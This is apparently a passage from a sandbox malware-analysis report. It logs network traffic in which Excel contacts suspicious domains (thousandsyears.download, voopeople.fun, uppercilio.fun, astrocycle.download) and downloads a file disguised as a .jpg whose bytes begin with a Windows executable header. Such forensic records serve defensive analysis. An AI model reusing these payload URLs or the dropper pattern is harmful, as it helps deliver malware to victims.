Jul 6, 2021 16:11:24.883909941 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.883932114 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.885464907 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.888473034 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.888501883 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.888524055 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.888537884 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.894095898 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.907902002 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.964520931 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.964579105 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.964617968 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.964654922 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.964797020 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.965497017 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.965554953 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.965599060 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.965661049 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.967675924 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.967716932 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.967756987 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.967794895 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.967794895 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.967854977 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.969552994 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.969594002 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.969688892 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.970940113 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.970978975 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.971026897 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.971056938 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.971069098 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.971124887 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.973124027 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.973160982 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.973208904 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.973231077 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.973252058 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.973313093 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.975342989 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.975380898 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.975428104 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.975471973 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.975497961 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.975534916 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:24.977544069 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.977583885 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.977612019 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:24.977664948 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.051588058 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.051649094 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.051680088 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.051708937 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.051915884 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.053641081 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.053684950 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.053731918 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.053775072 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.053920031 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.055805922 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.055849075 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.055886030 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.055902958 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.055923939 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.055967093 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.056878090 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.056921005 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.056973934 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.059053898 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.059092045 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.059155941 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.059179068 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.059195995 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.059386969 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.061100960 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.061192989 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.061304092 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.061307907 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.061348915 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.061435938 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.063280106 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.063352108 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.063466072 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.063473940 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.063522100 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.063592911 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.065565109 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.141612053 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.141805887 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.141813040 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.141913891 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.141976118 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.142009020 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.143305063 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.143393040 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.143399954 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.143436909 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.143551111 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.144454956 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.144498110 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.144536018 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.144589901 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.145592928 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.145647049 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.145809889 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.147762060 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.147802114 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.147839069 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.147876024 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.147891998 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.147958040 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.149597883 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.149641991 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.149744987 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.150713921 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.150758028 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.150865078 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.152148962 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.152194023 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.152251005 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.152297020 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.152338982 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.152374029 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.153589010 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.153630018 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.153712034 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.155287027 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.230751991 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.230808973 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.230846882 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.230884075 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.230916977 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.230959892 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.232806921 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.232850075 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.232886076 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.232908010 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.232933998 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.232984066 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.235018969 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.235059023 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.235099077 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.235105991 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.235177994 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.235245943 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.237263918 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.237306118 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.237344980 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.237382889 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.237384081 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.237560034 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.239263058 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.239326954 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.239414930 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.240537882 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.240619898 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.240658045 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.240724087 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.240761995 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.240869999 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.241687059 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.241728067 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.241832018 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.243279934 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.243329048 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.243452072 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.244883060 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.244951010 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.244990110 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.245028019 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.245049953 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.245115042 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.247356892 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.247406006 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.247442007 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.247490883 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.247525930 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.247601032 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.247766018 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.249285936 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.249327898 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.249363899 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.249438047 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.249439001 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.249558926 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.253657103 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.317754030 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.317903042 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.317970991 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.318012953 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.318325996 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.319262028 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.319302082 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.319417953 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.320070028 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.320108891 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.320188046 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.321547985 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.321589947 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.321737051 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.323262930 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.323307037 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.323340893 CEST	443	49170	143.204.91.74	192.168.2.22
Jul 6, 2021 16:11:25.323563099 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:25.515963078 CEST	49171	80	192.168.2.22	172.67.213.115
Jul 6, 2021 16:11:25.557764053 CEST	80	49171	172.67.213.115	192.168.2.22
Jul 6, 2021 16:11:25.557918072 CEST	49171	80	192.168.2.22	172.67.213.115
Jul 6, 2021 16:11:25.558825970 CEST	49171	80	192.168.2.22	172.67.213.115
Jul 6, 2021 16:11:25.597691059 CEST	80	49171	172.67.213.115	192.168.2.22
Jul 6, 2021 16:11:26.105088949 CEST	80	49171	172.67.213.115	192.168.2.22
Jul 6, 2021 16:11:26.105140924 CEST	80	49171	172.67.213.115	192.168.2.22
Jul 6, 2021 16:11:26.105324030 CEST	49171	80	192.168.2.22	172.67.213.115
Jul 6, 2021 16:11:28.695969105 CEST	49170	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:11:28.696268082 CEST	49171	80	192.168.2.22	172.67.213.115
Jul 6, 2021 16:13:22.160449982 CEST	49169	80	192.168.2.22	104.21.55.83
Jul 6, 2021 16:13:22.161217928 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:13:22.161720037 CEST	49167	80	192.168.2.22	172.67.198.51
Jul 6, 2021 16:13:22.200424910 CEST	80	49168	172.67.194.117	192.168.2.22
Jul 6, 2021 16:13:22.200629950 CEST	49168	80	192.168.2.22	172.67.194.117
Jul 6, 2021 16:13:22.202997923 CEST	80	49167	172.67.198.51	192.168.2.22
Jul 6, 2021 16:13:22.203033924 CEST	80	49169	104.21.55.83	192.168.2.22
Jul 6, 2021 16:13:22.203135967 CEST	49167	80	192.168.2.22	172.67.198.51
Jul 6, 2021 16:13:22.203282118 CEST	49169	80	192.168.2.22	104.21.55.83

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 6, 2021 16:11:22.198232889 CEST	52197	53	192.168.2.22	8.8.8.8
Jul 6, 2021 16:11:22.253839016 CEST	53	52197	8.8.8.8	192.168.2.22
Jul 6, 2021 16:11:22.407054901 CEST	53099	53	192.168.2.22	8.8.8.8
Jul 6, 2021 16:11:22.473217010 CEST	53	53099	8.8.8.8	192.168.2.22
Jul 6, 2021 16:11:22.640376091 CEST	52838	53	192.168.2.22	8.8.8.8
Jul 6, 2021 16:11:22.695327997 CEST	53	52838	8.8.8.8	192.168.2.22
Jul 6, 2021 16:11:23.804003954 CEST	61200	53	192.168.2.22	8.8.8.8
Jul 6, 2021 16:11:23.866746902 CEST	53	61200	8.8.8.8	192.168.2.22
Jul 6, 2021 16:11:23.889940023 CEST	49548	53	192.168.2.22	8.8.8.8
Jul 6, 2021 16:11:23.947441101 CEST	53	49548	8.8.8.8	192.168.2.22
Jul 6, 2021 16:11:25.355717897 CEST	55627	53	192.168.2.22	8.8.8.8
Jul 6, 2021 16:11:25.441780090 CEST	53	55627	8.8.8.8	192.168.2.22
Jul 6, 2021 16:11:25.455209970 CEST	56009	53	192.168.2.22	8.8.8.8
Jul 6, 2021 16:11:25.513394117 CEST	53	56009	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 6, 2021 16:11:22.198232889 CEST	192.168.2.22	8.8.8.8	0x73f5	Standard query (0)	thousandsyears.download	A (IP address)	IN (0x0001)
Jul 6, 2021 16:11:22.407054901 CEST	192.168.2.22	8.8.8.8	0x8296	Standard query (0)	voopeople.fun	A (IP address)	IN (0x0001)
Jul 6, 2021 16:11:22.640376091 CEST	192.168.2.22	8.8.8.8	0x15d4	Standard query (0)	uppercilio.fun	A (IP address)	IN (0x0001)
Jul 6, 2021 16:11:23.804003954 CEST	192.168.2.22	8.8.8.8	0x6d9f	Standard query (0)	aws.amazon.com	A (IP address)	IN (0x0001)
Jul 6, 2021 16:11:23.889940023 CEST	192.168.2.22	8.8.8.8	0xa3a3	Standard query (0)	aws.amazon.com	A (IP address)	IN (0x0001)
Jul 6, 2021 16:11:25.355717897 CEST	192.168.2.22	8.8.8.8	0xb187	Standard query (0)	astrocycle.download	A (IP address)	IN (0x0001)
Jul 6, 2021 16:11:25.455209970 CEST	192.168.2.22	8.8.8.8	0xb163	Standard query (0)	astrocycle.download	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jul 6, 2021 16:11:22.253839016 CEST	8.8.8.8	192.168.2.22	0x73f5	No error (0)	thousandsyears.download		172.67.198.51	A (IP address)	IN (0x0001)
Jul 6, 2021 16:11:22.253839016 CEST	8.8.8.8	192.168.2.22	0x73f5	No error (0)	thousandsyears.download		104.21.52.111	A (IP address)	IN (0x0001)
Jul 6, 2021 16:11:22.473217010 CEST	8.8.8.8	192.168.2.22	0x8296	No error (0)	voopeople.fun		172.67.194.117	A (IP address)	IN (0x0001)
Jul 6, 2021 16:11:22.473217010 CEST	8.8.8.8	192.168.2.22	0x8296	No error (0)	voopeople.fun		104.21.12.122	A (IP address)	IN (0x0001)
Jul 6, 2021 16:11:22.695327997 CEST	8.8.8.8	192.168.2.22	0x15d4	No error (0)	uppercilio.fun		104.21.55.83	A (IP address)	IN (0x0001)
Jul 6, 2021 16:11:22.695327997 CEST	8.8.8.8	192.168.2.22	0x15d4	No error (0)	uppercilio.fun		172.67.146.88	A (IP address)	IN (0x0001)
Jul 6, 2021 16:11:23.866746902 CEST	8.8.8.8	192.168.2.22	0x6d9f	No error (0)	aws.amazon.com	tp.8e49140c2-frontier.amazon.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 16:11:23.866746902 CEST	8.8.8.8	192.168.2.22	0x6d9f	No error (0)	tp.8e49140c2-frontier.amazon.com	dr49lng3n1n2s.cloudfront.net		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 16:11:23.866746902 CEST	8.8.8.8	192.168.2.22	0x6d9f	No error (0)	dr49lng3n1n2s.cloudfront.net		143.204.91.74	A (IP address)	IN (0x0001)
Jul 6, 2021 16:11:23.947441101 CEST	8.8.8.8	192.168.2.22	0xa3a3	No error (0)	aws.amazon.com	tp.8e49140c2-frontier.amazon.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 16:11:23.947441101 CEST	8.8.8.8	192.168.2.22	0xa3a3	No error (0)	tp.8e49140c2-frontier.amazon.com	dr49lng3n1n2s.cloudfront.net		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 16:11:23.947441101 CEST	8.8.8.8	192.168.2.22	0xa3a3	No error (0)	dr49lng3n1n2s.cloudfront.net		143.204.91.74	A (IP address)	IN (0x0001)
Jul 6, 2021 16:11:25.441780090 CEST	8.8.8.8	192.168.2.22	0xb187	No error (0)	astrocycle.download		172.67.213.115	A (IP address)	IN (0x0001)
Jul 6, 2021 16:11:25.441780090 CEST	8.8.8.8	192.168.2.22	0xb187	No error (0)	astrocycle.download		104.21.37.209	A (IP address)	IN (0x0001)
Jul 6, 2021 16:11:25.513394117 CEST	8.8.8.8	192.168.2.22	0xb163	No error (0)	astrocycle.download		172.67.213.115	A (IP address)	IN (0x0001)
Jul 6, 2021 16:11:25.513394117 CEST	8.8.8.8	192.168.2.22	0xb163	No error (0)	astrocycle.download		104.21.37.209	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

thousandsyears.download

voopeople.fun

uppercilio.fun

astrocycle.download

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	172.67.198.51	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 16:11:22.308283091 CEST	0	OUT	GET /div/44376,8555986111.jpg HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: thousandsyears.download Connection: Keep-Alive
Jul 6, 2021 16:11:22.382234097 CEST	1	IN	HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 14:11:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 891 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=KbYlb5AdgLthnk%2BDCUBAp0%2B9yVda04nyu8kJoXQiuAmRNjldT5DbK6BsEL0JFmS%2FAFrB4yyGkw649LSAbnzFK9mTe7JZxg0mohY8hUTtJinXHo8vrWcTrSIr4EQVjAIMShs8Nhc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 66a96c009b324e3d-FRA Content-Encoding: gzip alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a Data Ascii: 14
Jul 6, 2021 16:11:22.382285118 CEST	1	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49168	172.67.194.117	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 16:11:22.517206907 CEST	2	OUT	GET /div/44376,8555986111.jpg HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: voopeople.fun Connection: Keep-Alive
Jul 6, 2021 16:11:22.584856033 CEST	3	IN	HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 14:11:22 GMT Content-Type: application/octet-stream Content-Length: 57856 Connection: keep-alive Content-Disposition: attachment; filename=lsdfik.fml Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 890 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=risMmPhYq3wJrZz3k9%2B14IWDNOTX2c3xVZeTWQ8vfS%2F1tYGToTa1Zpy%2BtPFdIEr%2BzGkKsBVqMbjWiw3k5uTVECdcd%2Bf04gzug%2FduYbWecaOL8G%2BwShwaiRtJCg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 66a96c01eedb2c22-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 